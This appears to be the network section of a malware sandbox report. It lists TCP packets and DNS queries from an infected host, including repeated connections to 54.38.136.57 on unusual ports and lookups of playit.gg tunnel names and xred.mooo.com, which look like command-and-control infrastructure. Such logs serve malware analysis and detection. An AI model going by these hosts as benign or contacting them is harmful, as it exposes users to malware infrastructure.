Jan 26, 2022 02:40:42.235145092 CET  49770        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.235157967 CET  443          49771      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.235620022 CET  49770        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.235631943 CET  443          49770      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.235647917 CET  49771        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.236454010 CET  49771        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.236466885 CET  443          49771      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.318428993 CET  443          49770      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.318428040 CET  443          49771      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.318510056 CET  49771        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.318537951 CET  49770        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.320663929 CET  49771        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.320676088 CET  443          49771      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.325081110 CET  49771        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.325093985 CET  443          49771      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.325542927 CET  49770        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.325555086 CET  443          49770      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.330351114 CET  49770        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.330358982 CET  443          49770      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.526879072 CET  443          49770      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.526952982 CET  49770        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.526967049 CET  443          49770      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.527002096 CET  443          49770      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.527018070 CET  49770        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.527045012 CET  49770        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.528013945 CET  49770        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.528038025 CET  443          49770      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.539189100 CET  443          49771      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.539303064 CET  443          49771      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.539324045 CET  49771        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.539360046 CET  49771        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.554353952 CET  49771        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.554379940 CET  443          49771      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.555773020 CET  49772        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.555826902 CET  443          49772      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.556169987 CET  49772        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.556868076 CET  49773        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.556924105 CET  443          49773      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.557025909 CET  49773        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.557898998 CET  49772        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.557924032 CET  443          49772      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.558496952 CET  49773        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.558520079 CET  443          49773      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.606714010 CET  443          49773      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.606933117 CET  49773        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.609262943 CET  443          49772      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.609435081 CET  49772        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.610310078 CET  49773        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.610330105 CET  443          49773      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.615222931 CET  49773        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.615247011 CET  443          49773      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.617470026 CET  49772        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.617482901 CET  443          49772      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.621450901 CET  49772        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.621465921 CET  443          49772      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.808711052 CET  443          49773      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.808825970 CET  443          49773      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.808835030 CET  443          49772      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.808902979 CET  49773        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.808923006 CET  49773        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.809000015 CET  443          49772      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.809017897 CET  49772        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.809267998 CET  49772        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.818929911 CET  49773        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.818972111 CET  443          49773      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.820359945 CET  49774        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.820399046 CET  443          49774      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.820897102 CET  49774        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.820916891 CET  49774        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.820921898 CET  443          49774      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.822276115 CET  49772        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.822294950 CET  443          49772      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.823591948 CET  49775        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.823632956 CET  443          49775      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.823723078 CET  49775        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.825406075 CET  49775        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.825443983 CET  443          49775      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.869520903 CET  443          49774      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.869803905 CET  49774        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.871577978 CET  49774        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.871584892 CET  443          49774      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.872040033 CET  443          49775      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.872159958 CET  49775        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.875983953 CET  49774        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.875989914 CET  443          49774      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.878705978 CET  49775        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.878726959 CET  443          49775      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.886168003 CET  49775        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.886183977 CET  443          49775      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.075062990 CET  443          49774      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.075215101 CET  443          49774      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.075278997 CET  49774        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.075463057 CET  49774        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.080125093 CET  49774        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.080156088 CET  443          49774      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.081383944 CET  49776        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.081437111 CET  443          49776      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.084027052 CET  49776        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.084311962 CET  443          49775      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.084455013 CET  443          49775      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.084525108 CET  49775        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.084661007 CET  49775        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.085376978 CET  49776        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.085396051 CET  443          49776      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.089505911 CET  49775        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.089531898 CET  443          49775      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.090945959 CET  49777        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.091006041 CET  443          49777      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.091164112 CET  49777        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.091852903 CET  49777        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.091864109 CET  443          49777      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.133397102 CET  443          49776      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.134305954 CET  49776        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.139628887 CET  443          49777      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.139765024 CET  49777        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.145829916 CET  49776        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.145842075 CET  443          49776      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.145870924 CET  49777        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.145885944 CET  443          49777      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.154556990 CET  49777        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.154577971 CET  443          49777      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.154675007 CET  49776        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.154685974 CET  443          49776      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.348932028 CET  443          49776      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.349109888 CET  443          49776      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.350287914 CET  49776        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.354142904 CET  49776        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.354173899 CET  443          49776      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.364939928 CET  443          49777      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.365044117 CET  443          49777      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.365051985 CET  49777        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.365166903 CET  49777        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.370109081 CET  49778        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.370194912 CET  443          49778      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:43.370342970 CET  49778        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.370606899 CET  49777        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:43.370630026 CET  443          49777      142.250.186.46  192.168.2.3
                                                  Jan 26, 2022 02:40:43.370991945 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.371032000 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.372658968 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.372692108 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.374839067 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.375968933 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.375994921 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.420484066 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.421040058 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.421334028 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.421437979 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.421456099 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.421566010 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.423446894 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.423466921 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.426187992 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.426202059 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.427787066 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.427800894 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.624311924 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.624422073 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.624464989 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.624627113 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.628077030 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.628099918 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.629750967 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.629806042 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.630062103 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.632761955 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.632796049 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.636605978 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.636810064 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.636862993 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.638495922 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.638539076 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.638569117 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.640846968 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.640923977 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.641130924 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.642049074 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.642107010 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.682384968 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.682523966 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.683043003 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.683057070 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.689419985 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.689444065 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.691965103 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.692509890 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.692534924 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.692544937 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.696571112 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.696597099 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.894721031 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.894834995 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.894889116 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.894912004 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.925087929 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.925307989 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.925389051 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.925538063 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:44.087779999 CET4978248129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:44.126846075 CET481294978254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:44.127511978 CET4978248129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:44.127594948 CET4978248129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:44.166464090 CET481294978254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:44.180835962 CET481294978254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:45.259968042 CET4978353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:45.299190044 CET538114978354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:45.299659967 CET4978353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:45.303270102 CET4978353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:45.342216015 CET538114978354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:45.346260071 CET4978353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:45.353024960 CET538114978354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:45.385160923 CET538114978354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:49.404068947 CET4978448129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:49.442934990 CET481294978454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:49.443078041 CET4978448129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:49.443547010 CET4978448129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:49.482191086 CET481294978454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:49.496218920 CET481294978454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:49.526827097 CET4978553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:49.565207958 CET538114978554.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:49.565371990 CET4978553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:49.565803051 CET4978553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:49.604188919 CET538114978554.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:49.617434978 CET538114978554.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:53.794770956 CET4978653811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:53.832101107 CET538114978654.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:53.833930016 CET4978653811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:53.833969116 CET4978653811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:53.871345043 CET538114978654.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:53.885462999 CET538114978654.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:54.616602898 CET4978748129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:54.656188965 CET481294978754.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:54.656364918 CET4978748129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:54.656883955 CET4978748129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:54.696202040 CET481294978754.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:54.710160017 CET481294978754.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:57.243987083 CET804976869.42.215.252192.168.2.3
                                                  Jan 26, 2022 02:40:57.244071960 CET4976880192.168.2.369.42.215.252
                                                  Jan 26, 2022 02:40:59.770898104 CET4979148129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:59.809400082 CET481294979154.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:59.809815884 CET4979148129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:59.810301065 CET4979148129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:59.848609924 CET481294979154.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:59.863280058 CET481294979154.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:04.935381889 CET497988808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:04.975810051 CET88084979854.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:05.675482988 CET497988808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:05.714715958 CET88084979854.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:06.378643990 CET497988808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:06.418020964 CET88084979854.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:12.049057007 CET804976869.42.215.252192.168.2.3
                                                  Jan 26, 2022 02:41:12.049118996 CET4976880192.168.2.369.42.215.252
                                                  Jan 26, 2022 02:41:13.620066881 CET4980453811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:13.657174110 CET538114980454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:13.657346964 CET4980453811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:13.666121960 CET4980453811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:13.703188896 CET538114980454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:13.708363056 CET538114980454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:17.911498070 CET4981253811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:17.948208094 CET538114981254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:17.948323965 CET4981253811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:17.949070930 CET4981253811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:17.986234903 CET538114981254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:17.986386061 CET4981253811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:18.003242970 CET538114981254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:18.023262978 CET538114981254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:22.386420012 CET4982953811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:22.424774885 CET538114982954.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:22.424907923 CET4982953811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:22.425719976 CET4982953811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:22.463989019 CET538114982954.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:22.477185011 CET538114982954.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:24.416754007 CET498328808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:24.455019951 CET88084983254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:25.067615986 CET498328808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:25.105802059 CET88084983254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:25.770844936 CET498328808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:25.809134960 CET88084983254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:33.347507000 CET4976880192.168.2.369.42.215.252
                                                  Jan 26, 2022 02:41:33.347816944 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:41:33.347876072 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:41:36.889070034 CET4984648129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:36.927077055 CET481294984654.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:36.927205086 CET4984648129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:36.927748919 CET4984648129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:36.965722084 CET481294984654.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:36.980101109 CET481294984654.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:42.717411995 CET4984853811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:42.756843090 CET538114984854.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:42.756947994 CET4984853811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:42.810355902 CET538114984854.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:42.813888073 CET4984853811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:42.814547062 CET4984853811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:42.853730917 CET538114984854.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:47.034209013 CET4985353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:47.074225903 CET538114985354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:47.074413061 CET4985353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:47.074661970 CET4985353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:47.113735914 CET538114985354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:47.127094984 CET538114985354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:48.043893099 CET498548808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:48.082422018 CET88084985454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:48.584870100 CET498548808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:48.623542070 CET88084985454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:49.131814957 CET498548808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:49.170486927 CET88084985454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:51.150990963 CET4985553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:51.190006971 CET538114985554.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:51.190118074 CET4985553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:51.190383911 CET4985553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:51.229233027 CET538114985554.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:51.347069025 CET538114985554.38.136.57192.168.2.3
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Jan 26, 2022 02:40:06.257282972 CET | 192.168.2.3 | 8.8.8.8 | 0x7501 | Standard query (0) | agonizing-bat.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:15.149310112 CET | 192.168.2.3 | 8.8.8.8 | 0x7c84 | Standard query (0) | chivalrous-condition.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:17.865683079 CET | 192.168.2.3 | 8.8.8.8 | 0x6f61 | Standard query (0) | agonizing-bat.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:20.763519049 CET | 192.168.2.3 | 8.8.8.8 | 0x31d5 | Standard query (0) | chivalrous-condition.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:25.355871916 CET | 192.168.2.3 | 8.8.8.8 | 0xc927 | Standard query (0) | chivalrous-condition.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:31.133385897 CET | 192.168.2.3 | 8.8.8.8 | 0x4285 | Standard query (0) | agonizing-bat.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:37.507339954 CET | 192.168.2.3 | 8.8.8.8 | 0x93b6 | Standard query (0) | agonizing-bat.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:40.671993017 CET | 192.168.2.3 | 8.8.8.8 | 0x985e | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:41.326347113 CET | 192.168.2.3 | 8.8.8.8 | 0xfa1b | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:41.546551943 CET | 192.168.2.3 | 8.8.8.8 | 0xb07a | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:43.977015972 CET | 192.168.2.3 | 8.8.8.8 | 0xa0d2 | Standard query (0) | agonizing-bat.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:45.236999989 CET | 192.168.2.3 | 8.8.8.8 | 0x2fa6 | Standard query (0) | chivalrous-condition.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:49.288878918 CET | 192.168.2.3 | 8.8.8.8 | 0xc17 | Standard query (0) | agonizing-bat.auto.playit.gg | A (IP address) | IN (0x0001) |
